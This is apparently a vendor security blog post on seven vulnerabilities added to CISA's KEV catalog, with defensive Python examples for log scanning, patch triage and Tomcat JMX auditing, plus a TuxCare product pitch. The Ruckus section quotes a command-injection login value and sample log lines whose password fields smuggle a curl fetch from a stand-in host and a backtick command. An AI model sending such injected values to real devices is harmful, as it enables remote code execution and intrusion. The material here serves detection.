Seven Known Exploited Vulnerabilities Added to CISA Catalog
CISA (the Cybersecurity and Infrastructure Security Agency) added seven vulnerabilities, most of them with a link to Linux, to its Known Exploited Vulnerabilities (KEV) catalog on May 12, 2023.
They are a Ruckus access point remote code execution flaw (CVE-2023-25717), a Red Hat Polkit privilege escalation (CVE-2021-3560), two Linux kernel privilege escalations (CVE-2014-0196 and CVE-2010-3904), a Jenkins UI information disclosure (CVE-2015-5317), an Apache Tomcat remote code execution flaw (CVE-2016-8735), and an Oracle Java SE and JRockit flaw (CVE-2016-3427).
The Ruckus vulnerability has been exploited by the AndoryuBot DDoS botnet. There are no public reports of in-the-wild exploitation for the other six, but technical details and proof-of-concept (PoC) exploits are available for them, and some have been public for roughly a decade.
Seven Known Exploited Vulnerabilities
CVE-2023-25717 (Ruckus Wireless Admin): Ruckus Wireless Admin through 10.4 allows remote code execution via an unauthenticated HTTP GET request, as demonstrated by a /forms/doLogin?login_username=admin&password=password$(curl substring. The $( in the password value is shell command substitution: the demonstrated request shows the login parameters reaching a shell unsanitized, so no valid credentials are needed.
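The request shape above is what a defender can look for in web server or proxy logs. The following scanner is an added example written for this article, not Ruckus code or tooling: it parses combined-format access log lines (constructed samples, not real traffic), URL-decodes the query of any request to /forms/doLogin, and flags login_username or password values that carry shell command-substitution or pipeline metacharacters. The log format, sample addresses and the set of metacharacters are assumptions; adjust them to your own logging.

```python
"""Flag access-log requests that match the CVE-2023-25717 request shape."""
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample lines in combined log format (not real traffic).
# Line 1 carries password=password$(curl 198.51.100.9/a), line 3 a backtick
# payload, line 2 is a benign login, line 4 is unrelated.
SAMPLE_LOG = """\
203.0.113.7 - - [12/May/2023:10:01:02 +0000] "GET /forms/doLogin?login_username=admin&password=password%24%28curl%20198.51.100.9%2Fa%29 HTTP/1.1" 200 512 "-" "curl/7.88.1"
198.51.100.21 - - [12/May/2023:10:01:05 +0000] "GET /forms/doLogin?login_username=admin&password=S3cret HTTP/1.1" 302 0 "-" "Mozilla/5.0"
203.0.113.7 - - [12/May/2023:10:01:09 +0000] "GET /forms/doLogin?login_username=admin&password=x%60id%60 HTTP/1.1" 200 512 "-" "python-requests/2.31"
192.0.2.44 - - [12/May/2023:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

# Combined log format: client, identity, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# Metacharacters that turn a login field into a shell command on an
# unpatched device: $(...), backticks, pipes, semicolons (assumed set).
SHELL_META_RE = re.compile(r'\$\(|`|\||;')
TARGET_PATH = "/forms/doLogin"
WATCHED_PARAMS = ("login_username", "password")


def scan_line(line):
    """Return a finding dict for a suspicious doLogin request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if url.path != TARGET_PATH:
        return None
    # keep_blank_values so an empty parameter still appears; unquote once
    # more afterwards in case the client double-encoded the payload
    params = parse_qs(url.query, keep_blank_values=True)
    hits = {}
    for name in WATCHED_PARAMS:
        for value in params.get(name, []):
            value = unquote(value)
            if SHELL_META_RE.search(value):
                hits[name] = value
    if not hits:
        return None
    return {
        "ip": m.group("ip"),
        "time": m.group("ts"),
        "status": m.group("status"),
        "params": hits,
    }


def scan_log(text):
    """Scan a whole log and return the list of findings in order."""
    return [r for r in (scan_line(l) for l in text.splitlines()) if r]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

A 200 response to such a request is worth treating as a likely successful execution rather than a blocked attempt; on a patched device the login parameters should never reach a shell, so any hit from an unpatched firmware version warrants isolating the access point and reviewing what the substituted command fetched.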
CVE-2021-3560 (Polkit, as shipped by Red Hat): this flaw lets an unprivileged local attacker bypass Polkit's credential checks for D-Bus requests and, for example, create a new local administrator account or perform similar privileged actions. The main risks are loss of data confidentiality and integrity and full compromise of the affected system.
CVE-2014-0196 (Linux kernel): a race condition in the kernel's tty layer (n_tty_write) involving concurrent read and write operations with long strings lets local users cause a denial of service (memory corruption and system crash) or potentially gain elevated privileges.
CVE-2010-3904 (Linux kernel): in the Linux kernel prior to version 2.6.36, the rds_page_copy_user function in net/rds/page.c, part of the Reliable Datagram Sockets (RDS) protocol implementation, does not properly validate addresses obtained from user space. This lets local users gain elevated privileges through crafted use of the sendmsg and recvmsg system calls. The RDS module is rarely needed on general-purpose hosts, and the kernel will load it on demand when a process opens an RDS socket unless module loading for it is blocked, so the attack surface exists even where nothing legitimately uses RDS.
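For the Polkit and kernel entries, `uname -r` or the upstream version string is a poor patch-state indicator, because enterprise distributions backport fixes without changing the upstream version number. The example below, added for this article and not distribution tooling, shows two checks a practitioner would run instead: whether the installed package's changelog (in the shape of `rpm -q --changelog kernel` or `apt-get changelog`) records a fix for each of the KEV CVEs, and whether the RDS module behind CVE-2010-3904 is prevented from loading. The changelog text and modprobe.d fragments are constructed samples; the CVE-to-package mapping is taken from the list above.

```python
"""Triage a Linux host against the Polkit and kernel KEV entries."""
import re

# KEV CVEs from the list above, keyed by the package that carries the fix.
KEV_CVES = {
    "kernel": ["CVE-2014-0196", "CVE-2010-3904"],
    "polkit": ["CVE-2021-3560"],
}

# Constructed sample in the shape of `rpm -q --changelog kernel`. The RDS
# entry deliberately omits the CVE id, as real changelogs sometimes do.
SAMPLE_KERNEL_CHANGELOG = """\
* Tue May 20 2014 Builder <builder@example.invalid> [2.6.32-431.20.3.el6]
- [tty] n_tty: fix race in n_tty_write with LECHO and !OPOST (CVE-2014-0196)
* Mon Nov 08 2010 Builder <builder@example.invalid> [2.6.32-71.7.1.el6]
- [net] rds: validate user addresses in rds_page_copy_user
"""
SAMPLE_POLKIT_CHANGELOG = """\
* Thu Jun 03 2021 Builder <builder@example.invalid> 0.115-11.el8_4.1
- Fix local privilege escalation via D-Bus auth bypass (CVE-2021-3560)
"""
# Constructed /etc/modprobe.d fragments.
MODPROBE_BLACKLIST_ONLY = "blacklist rds\n"
MODPROBE_INSTALL_TRUE = "# CVE-2010-3904 mitigation\ninstall rds /bin/true\n"

CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")


def cves_in_changelog(changelog):
    """Set of CVE ids the changelog mentions (taken to mean 'fixed')."""
    return set(CVE_RE.findall(changelog))


def unmentioned_cves(package, changelog):
    """KEV CVEs for `package` that the changelog never mentions.

    Treat these as unresolved until the vendor advisory confirms otherwise:
    a fix may have landed without the CVE id in the changelog, as the RDS
    entry in the sample shows, so absence is a prompt to check, not proof.
    """
    return sorted(set(KEV_CVES[package]) - cves_in_changelog(changelog))


def rds_load_status(modprobe_conf):
    """Classify how modprobe.d treats the rds module.

    'blocked'        : an `install rds /bin/true` (or /bin/false) override,
                       which wins for every load path, including by name.
    'blacklist-only' : `blacklist rds` only suppresses alias-based loading;
                       a load by name (modprobe rds, or as a dependency)
                       still succeeds, so the usual hardening form is the
                       install override above.
    'loadable'       : nothing restricts the module.
    """
    status = "loadable"
    for raw in modprobe_conf.splitlines():
        line = raw.split("#", 1)[0].strip()
        if re.match(r"install\s+rds\s+/bin/(true|false)\b", line):
            return "blocked"
        if re.match(r"blacklist\s+rds\b", line):
            status = "blacklist-only"
    return status


def triage(kernel_changelog, polkit_changelog, modprobe_conf):
    """Combine the checks into one report for the host."""
    return {
        "kernel_unmentioned": unmentioned_cves("kernel", kernel_changelog),
        "polkit_unmentioned": unmentioned_cves("polkit", polkit_changelog),
        "rds_load_status": rds_load_status(modprobe_conf),
    }


if __name__ == "__main__":
    print(triage(SAMPLE_KERNEL_CHANGELOG, SAMPLE_POLKIT_CHANGELOG,
                 MODPROBE_INSTALL_TRUE))
```

On a real host, feed the functions the output of the distribution's changelog command and the concatenated contents of /etc/modprobe.d/*.conf. The sample deliberately reports CVE-2010-3904 as unmentioned even though its fix is present, which is exactly the case where a practitioner must fall back to the vendor advisory rather than trusting either the version string or the changelog alone.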
CVE-2015-5317 (Jenkins): in Jenkins versions before 1.638 and LTS versions before 1.625.2, the Fingerprints pages could let remote attackers obtain sensitive job and build name information via a direct request.
CVE-2016-8735 (Apache Tomcat): remote code execution is possible when Tomcat's JmxRemoteLifecycleListener is in use and an attacker can reach the JMX ports it opens. The listener was not updated for consistency with Oracle's fix for CVE-2016-3427, which restricted the credential object types the JMX remote server accepts, so the Tomcat listener kept accepting the unsafe ones.
CVE-2016-3427 (Oracle Java SE and JRockit): a flaw in the JMX (Java Management Extensions) component of Oracle Java SE 6u113, 7u99 and 8u77, Java SE Embedded 8u77 and JRockit R28.3.9 that a remote attacker can exploit over the network to affect confidentiality, integrity and availability.
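Both the Tomcat and the Java entries hinge on a reachable JMX remote port, so the first question for an inventory is which Tomcat instances configure JmxRemoteLifecycleListener at all and on which ports and interface. The audit below is an added example written for this article, not Apache Tomcat code: it parses a server.xml (a constructed sample) and reports every such listener. The className and the rmiRegistryPortPlatform, rmiServerPortPlatform and rmiBindAddress attribute names are the ones Tomcat documents for this listener; the assumption that an unset rmiBindAddress means binding on all interfaces follows the listener's documented default.

```python
"""List JmxRemoteLifecycleListener instances in a Tomcat server.xml."""
import xml.etree.ElementTree as ET

# Constructed sample server.xml with one exposed JMX listener.
SAMPLE_SERVER_XML = """\
<Server port="8005" shutdown="SHUTDOWN">
  <Listener className="org.apache.catalina.core.AprLifecycleListener" />
  <Listener className="org.apache.catalina.mbeans.JmxRemoteLifecycleListener"
            rmiRegistryPortPlatform="10001" rmiServerPortPlatform="10002" />
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" />
  </Service>
</Server>
"""

JMX_LISTENER = "org.apache.catalina.mbeans.JmxRemoteLifecycleListener"
LOOPBACK = ("127.0.0.1", "localhost", "::1")


def find_jmx_listeners(server_xml):
    """Return one finding per JmxRemoteLifecycleListener in the document."""
    root = ET.fromstring(server_xml)
    findings = []
    # iter() walks nested elements too, in case the listener sits under
    # a Service or Engine rather than directly under Server.
    for el in root.iter("Listener"):
        if el.get("className") != JMX_LISTENER:
            continue
        bind = el.get("rmiBindAddress")
        findings.append({
            "registry_port": el.get("rmiRegistryPortPlatform"),
            "server_port": el.get("rmiServerPortPlatform"),
            # Unset rmiBindAddress binds on all interfaces (listener default),
            # which makes both RMI ports network-reachable.
            "bind_address": bind or "all interfaces (default)",
            "remotely_reachable": bind not in LOOPBACK,
        })
    return findings


def exposed_jmx_listeners(server_xml):
    """Only the listeners that an off-host attacker could reach."""
    return [f for f in find_jmx_listeners(server_xml) if f["remotely_reachable"]]


if __name__ == "__main__":
    for finding in find_jmx_listeners(SAMPLE_SERVER_XML):
        print(finding)
```

A listener that binds to loopback still exposes the ports to anything running on the host, so the durable fix is upgrading to a Tomcat release that carries the CVE-2016-8735 change (or removing the listener if JMX over RMI is not needed), with a firewall rule on both RMI ports as the interim control.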
Solutions for Those Exploited Vulnerabilities
Organizations often keep running Linux distributions after the vendor ends security support, while attackers continue to look for and exploit vulnerabilities in products that have reached end of life (EOL).
TuxCare offers a solution in the form of Extended Lifecycle Support. With this service, organizations can continue using these systems for up to four years beyond the official end-of-life date, and during that period TuxCare takes on the responsibility of providing automated vulnerability patches.
TuxCare also offers a live patching service for more than 40 Linux distributions, including popular ones such as CentOS, AlmaLinux, Debian, Ubuntu, Oracle Linux, Amazon Linux, CloudLinux, Red Hat, Rocky Linux, and Raspberry Pi OS.
Conclusion
The vulnerabilities above share a common link to Linux, which suggests they may have been exploited in attacks targeting Linux systems. The NIST NVD entry for each one references advisories from Linux distributions that describe the impact of the flaw and patch availability.
It is also likely that some of these issues have been exploited in attacks targeting Android devices, as the exploitation of Linux kernel vulnerabilities in Android attacks is not uncommon.
Two of the entries are connected: the Apache Tomcat flaw exists because a Tomcat component was not updated to match Oracle's fix for CVE-2016-3427. It is not evident, however, whether the flaws were chained in a single attack or whether they were exploited by the same threat actor.
The sources for this article include a story from SecurityWeek.